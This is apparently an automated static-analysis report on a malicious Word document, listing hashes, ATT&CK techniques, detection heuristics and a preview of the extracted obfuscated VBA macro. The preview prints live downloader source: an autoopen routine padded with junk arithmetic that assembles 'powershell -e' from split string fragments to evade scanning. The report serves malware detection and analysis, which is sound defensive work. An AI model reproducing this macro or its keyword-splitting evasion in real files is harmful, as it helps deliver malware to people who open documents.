Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e990d392e2db7b5…

MALICIOUS

Office (OLE)

230.5 KB Created: 2019-03-12 07:53:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 91749978ae8ad652d2029a50d80b5510 SHA-1: b807e0f31bc19ce029e9d2a01bfd5c5c3415e03a SHA-256: 6e990d392e2db7b5dea09010147f4658f09db55f6934a4d067849ccadc1a29cd
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize a GetObject call and reassembled string literals to construct a WMI query for 'winmgmts', which is then used to launch a process. This indicates the macro's intent is to download and execute a second-stage payload. The ClamAV detection and heuristic firings strongly suggest malicious downloader behavior.

Heuristics 9

  • ClamAV: Doc.Downloader.00536d-6890740-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6890740-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49210 bytes
SHA-256: 344566484c4bb55e1fe894f785a55f41d5f0f4dd9962dc4ad313799767362789
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oZDoCABk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vQABADZ()
   If wAUDDA = hxGXAkk_ Then
iQUCxkAo = 245895937 * CSng(434190620) / LQ_BAU - CBool(146184842 + EQDA_C) * 970884141 + Sin(525102278 + CDate(TA4CAAx))
jwACDBQ = (qAAAkABw / CInt(dX_DZAc) - dkD1G4A * Fix(104974774) - zAGAwUC - Round(AXDkUU - HBAAUAX / lZAAoA1 - 662838052))
End If
   If VQAA4G = jABkBUU Then
JxXAAD = 740826060 * Log(851122847) / soQAQU1 - Atn(271404698 + t1QAAB) * 915746297 + Fix(162231482 + Sin(hXAA4A))
MAU1BAwB = (pU1AG4A / Cos(c_AAB4x) - D_UABAx1 * Atn(407644382) - YUwcADBA - CDbl(KxAQ4UA - jBDBZD / rBUDXA - 176103019))
End If
   If rAQAxA = RBBAUAD Then
wAADAAXQ = 202891552 * Int(737638416) / VcBBkXA - Hex(376550989 + f1AXAAwA) * 474426165 + CDbl(130638673 + Cos(jG_AUAAk))
ikA41BA = (A_wkAA / CDate(C1UAZA) - uDwQAA * Tan(246002067) - kA1QBA - CSng(sk__BADX - qAADQU / ZAoACwA - 102417437))
End If
   If VoAUCxoX = aBQDUCBD Then
kQ_AxQ = 74649871 * CBool(96464522) / uAGBQxw - Log(900046075 + mUAADxA) * 690139830 + Sgn(515953174 + Sqr(bBUxAU))
WCQQAQD = (rDACAADc / Round(pxQUBZ) - PABo44Q * Atn(929368956) - wQDxAABA - Cos(pAAx1D - hBX1BAA / zAkUAAUA - 834561304))
End If
   If oAAwAQA = DA4ooUA Then
NCAwBZA = 365209079 * Cos(446197933) / DCAZAkA - Int(214021462 + hwUcZQA) * 196024252 + Fix(818847736 + Cos(RBQQBBAQ))
DAoDkUk = (bDD1AAAA / CBool(rAAUAAUA) - cAGCcB_ * Tan(515426922) - IQDAGoc - Sin(BAADBAXA - jAZUDw / V1AAAAc - 808859684))
End If
   If pQBAwDAo = cDUUAZQ Then
JGcAAA = 462339108 * Tan(516614689) / dAAAA4A - Round(779083558 + dAAA_BC) * 375382175 + Sgn(101524028 + Log(sZACxBc))
nBAAQZ = (pAXUBZAo / Sqr(SAwDAw) - b_GAQDGA * Tan(884081560) - iDCAwB - Int(v1coDAQ - sGAAwAc1 / BkAAAAAA - 684701417))
End If
End Function
Sub autoopen()
On Error Resume Next
   If MA_B1144 = IkQQQcA Then
wDAAQoAc = 858691887 * Sqr(582673788) / JcXwUA - Fix(88443558 + AkAQxAAx) * 880730224 + Sgn(823012543 + Sgn(sAGCXC))
QAxA1c = (dkACQAC / CLng(vQQAccQ) - QAZAwC * CLng(140191844) - PDUwxXB - CLng(nAZAcGAA - iAAAZAG / PAkAAQ - 668601793))
End If
   If QAAAAAU = fAAwDc Then
V1AAoo = 63278806 * Atn(555742508) / vAAAAA - CStr(977775803 + iAAAQU) * 613100927 + Fix(521894953 + Round(YAoBX_4))
XBGDBkZX = (zAA_GAC / CStr(akAAkCAA) - CQAD1AA * CLng(905396984) - LxZQACQw - Sgn(awAADB - ckBw_U / NACACAo - 446389576))
End If
   If D4ZAwA = SZxwQAw Then
jAUxBAo = 202346786 * Fix(107575224) / sAAXCAUx - CByte(91505190 + mUAAU1Aw) * 214072059 + CDbl(244209090 + Hex(UkAkZAAc))
jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782))
End If
l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)
   If YQUw_U = UBoABkAk Then
lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA))
DACAAA = (pAAAQk / Tan(LACQUccD) - HBGAGw * Rnd(279120986) - GAG4GBA - CDbl(fAA_AACc - bD1BxAxA / mAAABGA - 527282575))
End If
   If IxDx_GQ = sZGAB4k Then
bUAG1kZ = 710863586 * Round(625760837) / HCZCBAXA - Int(894190998 + GUDAUQQA) * 496635722 + Hex(257188928 + CBool(fABZAc))
CBUAAcUw = (EGBQ1k1 / Atn(wAxAZDUA) - V_DDDCAc * CDate(939504985) - rQcDXkU - Int(kXZABA - LAXDAZw / P_4xkDD1 - 127284557))
End If
End Sub
Function OUkZkAUB()
   If FAxAGAAA = zBkxAA Then
zQAQAxAw = 366715814 * Log(38438403) / Y4BwAA_ - Fix(385270432 + HA1U1oBC) * 152152554 + Cos(487973135 + Sqr(a1CAAx))
pUcA4Ac = (w4D4AUA / Sqr(kUUAoAUA) - ODA_AA * Fix(983956525) - YACACD - Sin(m4AoXBZ1 - TAGAAw / aGk_oXC - 601396180))
End If
   If ZDkAAQ_ = W_DowAox Then
UQ_AUQAX = 973681694 * Hex(863639344) / mAAAA_ - Tan(643906171 + jAQ_A_o) * 503858573 + Int(59073590 + Round(wGQAAAU))
RZADAUAU = (VDBXQZ / Sgn(iAAUAU) - DAAwAAB * Tan(553480099) - BA1AAA -
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.